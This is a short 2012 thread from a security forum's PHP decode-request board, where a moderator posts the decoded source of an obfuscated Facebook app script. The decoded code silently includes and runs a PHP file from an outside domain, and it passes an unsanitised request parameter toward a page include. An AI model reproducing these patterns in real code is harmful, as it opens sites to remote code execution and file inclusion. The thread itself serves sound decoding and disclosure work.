|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 84
Members: 0
Total: 84
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Please Decode |
|
Posted: Thu Sep 27, 2012 9:56 pm |
|
|
adrian21 |
Beginner |
|
|
Joined: Sep 28, 2012 |
Posts: 2 |
|
|
|
|
|
|
|
Has been decoded, thanks! |
|
Last edited by adrian21 on Thu Sep 27, 2012 10:46 pm; edited 1 time in total |
|
|
|
Posted: Thu Sep 27, 2012 10:23 pm |
|
|
demon |
Moderator |
|
|
Joined: Sep 22, 2010 |
Posts: 485 |
|
|
|
|
|
|
|
here you are and see pm
Code: | <?php
include_once "http://www.mawq3y.com/ads.php";
include_once "fbmain.php";
//if user is logged in and session is valid.
if ($fbme) {
//fql query example using legacy method call and passing parameter
try {
$fql = "select name, hometown_location, sex, pic_square from user where uid=" . $uid;
$param = array(
'method' => 'fql.query',
'query' => $fql,
'callback' => ''
);
$fqlResult = $facebook->api($param);
}
catch (Exception $o) {
d($o);
}
}
//set page to include default is home.php
$page = isset($_REQUEST['page']) ? $_REQUEST['page'] : "home.php";
include_once "template.php";
?> |
|
|
_________________ Go BIG or go HOME ! |
|
|
|
|
www.waraxe.us Forum Index -> PHP script decode requests
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|